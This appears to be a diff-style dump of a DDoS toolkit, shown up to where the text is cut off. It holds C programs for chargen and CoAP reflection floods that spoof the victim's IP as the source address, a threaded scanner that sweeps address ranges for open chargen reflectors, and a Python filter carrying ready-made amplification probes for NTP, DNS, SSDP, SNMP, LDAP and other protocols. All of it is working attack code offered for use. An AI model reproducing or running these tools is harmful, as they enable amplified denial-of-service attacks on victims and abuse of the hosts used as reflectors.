#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 1;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(19);
|
||||
udph->check = 0;
|
||||
memset((void *)udph + sizeof(struct udphdr), 0x01, 1);
|
||||
udph->len=htons(sizeof(struct udphdr) + 1);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026);
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting flood...\n");
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,189 @@
|
|||
/* priv8 chargen scanner. lel */
|
||||
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <signal.h>
|
||||
#include <sys/time.h>
|
||||
#include <sys/types.h>
|
||||
#include <math.h>
|
||||
#include <ctype.h>
|
||||
#include <errno.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
|
||||
volatile int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
volatile int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memset(buf, 0x01, 1);
|
||||
int sizeofpayload = 1;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(19);
|
||||
sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=sizeofpayload;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *recievethread()
|
||||
{
|
||||
printf("Started Listening Thread\n");
|
||||
int saddr_size, data_size, sock_raw;
|
||||
struct sockaddr_in saddr;
|
||||
struct in_addr in;
|
||||
|
||||
unsigned char *buffer = (unsigned char *)malloc(65536);
|
||||
sock_raw = socket(AF_INET , SOCK_RAW , IPPROTO_UDP);
|
||||
if(sock_raw < 0)
|
||||
{
|
||||
printf("Socket Error\n");
|
||||
exit(1);
|
||||
}
|
||||
while(1)
|
||||
{
|
||||
saddr_size = sizeof saddr;
|
||||
data_size = recvfrom(sock_raw , buffer , 65536 , 0 , (struct sockaddr *)&saddr , &saddr_size);
|
||||
if(data_size <0 )
|
||||
{
|
||||
printf("Recvfrom error , failed to get packets\n");
|
||||
exit(1);
|
||||
}
|
||||
struct iphdr *iph = (struct iphdr*)buffer;
|
||||
if(iph->protocol == 17)
|
||||
{
|
||||
unsigned short iphdrlen = iph->ihl*4;
|
||||
struct udphdr *udph = (struct udphdr*)(buffer + iphdrlen);
|
||||
unsigned char* payload = buffer + iphdrlen + 1;
|
||||
if(ntohs(udph->source) == 19)
|
||||
{
|
||||
int body_length = data_size - iphdrlen - 1;
|
||||
found_srvs++;
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
close(sock_raw);
|
||||
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <ip range start (192.168.0.0)> <ip range end (192.168.255.255)> <outfile> <threads> <scan delay in ms>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
|
||||
pthread_t listenthread;
|
||||
pthread_create( &listenthread, NULL, &recievethread, NULL);
|
||||
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
sleep(1);
|
||||
printf("Starting Scan...\n");
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Found");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Host/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "B/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Running Thrds");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Done");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,207 @@
|
|||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 21;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(5683);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "\x40\x01\x7d\x70\xbb\x2e\x77\x65\x6c\x6c\x2d\x6b\x6e\x6f\x77\x6e\x04\x63\x6f\x72\x65", 21);
|
||||
udph->len=htons(sizeof(struct udphdr) + 21);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
printf("[+] COAP [+] Somenthing are wrong, try again. [+] COAP [+]\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026);
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
printf("[+] COAP [+] Somenthing are wrong, try again. [+] COAP [+]\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
printf("[+] COAP [+]\n");
|
||||
fprintf(stdout, "[+] Use: %s <IP> <PORT> <COAP LIST> <THREADS> <PPS (-1)> <TIME>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
printf("[+] Starting attack... [+]\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,105 @@
|
|||
#!usr/bin/python
|
||||
# -*- coding: utf-8 -*-
|
||||
import socket
|
||||
import sys
|
||||
|
||||
if len(sys.argv) < 2:
|
||||
print '[!] EasyFilter 1.0 by Alemalakra.'
|
||||
print '[!] Usage: filter.py <INPUT> <OUTPUT> <PROTOCOL> <MIN BYTES> <OUTPUT SYNTAX>'
|
||||
print '[!] Protocols: chargen, ntp, quake, ssdp, ldap, dns, snmp, mdns, tftp, portmap, netbios, coap'
|
||||
print '[!] Output syntax variables: [space], [ip], [bytes]'
|
||||
sys.exit()
|
||||
|
||||
s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
|
||||
s.settimeout(0.05) # Fast list/scan of course.
|
||||
|
||||
# PayLoads.
|
||||
chargen = 'A'#lemalakra
|
||||
ntp = '\x17\x00\x03\x2a\x00\x00\x00\x00'
|
||||
quake = '\xFF\xFF\xFF\xFF\x67\x65\x74\x73\x74\x61\x74\x75\x73\x10'
|
||||
ssdp = "\x4d\x2d\x53\x45\x41\x52\x43\x48\x20\x2a\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0D\x0A\x48\x6f\x73\x74\x3a\x32\x33\x39\x2e\x32\x35\x35\x2e\x32\x35\x35\x2e\x32\x35\x30\x3a\x31\x39\x30\x30\x0D\x0A\x53\x54\x3a\x73\x73\x64\x70\x3a\x61\x6c\x6c\x0D\x0A\x4d\x61\x6e\x3a\x22\x73\x73\x64\x70\x3a\x64\x69\x73\x63\x6f\x76\x65\x72\x22\x0D\x0A\x4d\x58\x3a\x33\x0D\x0A\x0D\x0A"
|
||||
snmp = '\x30\x37\x02\x01\x01\x04\x06\x70\x75\x62\x6c\x69\x63\xa5\x2a\x02\x04\x06\x29\x07\x31\x02\x01\x00\x02\x01\x0a\x30\x1c\x30\x0b\x06\x07\x2b\x06\x01\x02\x01\x01\x01\x05\x00\x30\x0d\x06\x09\x2b\x06\x01\x02\x01\x01\x09\x01\x03\x05\x00'
|
||||
dns = '\xc4\x75\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\x00\xff\x00\x01\x00\x00\x29\x23\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
ldap = '\x30\x84\x00\x00\x00\x2d\x02\x01\x01\x63\x84\x00\x00\x00\x24\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x84\x00\x00\x00\x00\x00'
|
||||
mdns = '\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x09\x5F\x73\x65\x72\x76\x69\x63\x65\x73\x07\x5F\x64\x6E\x73\x2D\x73\x64\x04\x5F\x75\x64\x70\x05\x6C\x6F\x63\x61\x6C\x00\x00\x0C\x00\x01'
|
||||
tftp = '\x00\x01\x2f\x78\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00'
|
||||
portmap = '\x65\x72\x0A\x37\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xA0\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
|
||||
netbios = '\xE5\xD8\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x20\x43\x4B\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x21\x00\x01'
|
||||
coap = '\x40\x01\x7d\x70\xbb\x2e\x77\x65\x6c\x6c\x2d\x6b\x6e\x6f\x77\x6e\x04\x63\x6f\x72\x65'
|
||||
|
||||
file1 = sys.argv[1] #Input
|
||||
file2 = sys.argv[2] #Output
|
||||
proto = sys.argv[3]
|
||||
size = int(sys.argv[4])
|
||||
syntax = sys.argv[5]
|
||||
with open(file1) as f:
|
||||
list = f.read().splitlines()
|
||||
newfile = open(file2, 'w')
|
||||
if proto == 'tftp':
|
||||
port = 69
|
||||
payload = tftp
|
||||
elif proto == 'portmap':
|
||||
port = 111
|
||||
payload = portmap
|
||||
elif proto == 'netbios':
|
||||
port = 137
|
||||
payload = netbios
|
||||
elif proto == 'ntp':
|
||||
port = 123
|
||||
payload = ntp
|
||||
elif proto == 'mdns':
|
||||
port = 5353
|
||||
payload = mdns
|
||||
elif proto == 'chargen':
|
||||
port = 19
|
||||
payload = chargen
|
||||
elif proto == 'snmp':
|
||||
port = 161
|
||||
payload = snmp
|
||||
elif proto == 'dns':
|
||||
port = 53
|
||||
payload = dns
|
||||
elif proto == 'quake':
|
||||
port = 27960
|
||||
payload = quake
|
||||
elif proto == 'ssdp':
|
||||
port = 1900
|
||||
payload = ssdp
|
||||
elif proto == 'ldap':
|
||||
port = 389
|
||||
payload = ldap
|
||||
elif proto == 'coap':
|
||||
port = 5683
|
||||
payload = coap
|
||||
else:
|
||||
print '[!] Protocol is not available'
|
||||
sys.exit()
|
||||
# Start Loop
|
||||
c = 0
|
||||
servers = []
|
||||
while c < len(list):
|
||||
split = list[c].split(" ") # Bytes ones, and non bytes ones
|
||||
s.sendto(payload, (split[0], port))
|
||||
try:
|
||||
data, addr = s.recvfrom(65500)
|
||||
syntax_output = ""
|
||||
if len(data) >= size:
|
||||
if any(addr[0] in s for s in servers):
|
||||
# Already Exists
|
||||
rip = 0
|
||||
else:
|
||||
# Add so.
|
||||
print '[!] Recived Working Server: %s Recived Bytes: %i' % ( addr[0],len(data) )
|
||||
syntax_output = syntax.replace("[space]", " ", 5) # 5 is fine.
|
||||
syntax_output = syntax_output.replace("[bytes]", str(len(data)), 5) # 5 is fine.
|
||||
syntax_output = syntax_output.replace("[ip]", str(addr[0]), 5) # 5 is fine.
|
||||
newfile.write(str(syntax_output)+'\n')
|
||||
servers.append(addr[0])
|
||||
except Exception and socket.error and socket.timeout:
|
||||
I = 0
|
||||
c += 1
|
||||
|
||||
newfile.close()
|
||||
with open(file2) as e:
|
||||
count = e.read().splitlines()
|
||||
print '[!] Finished Filter saved to %s with %i working servers.' % ( file2,len(count) )
|
|
@ -0,0 +1 @@
|
|||
You can scan SOAP/WSD with Zmap using the probe https://github.com/zmap/zmap/blob/master/examples/udp-probes/wsd_3702.pkt
|
|
@ -0,0 +1,211 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
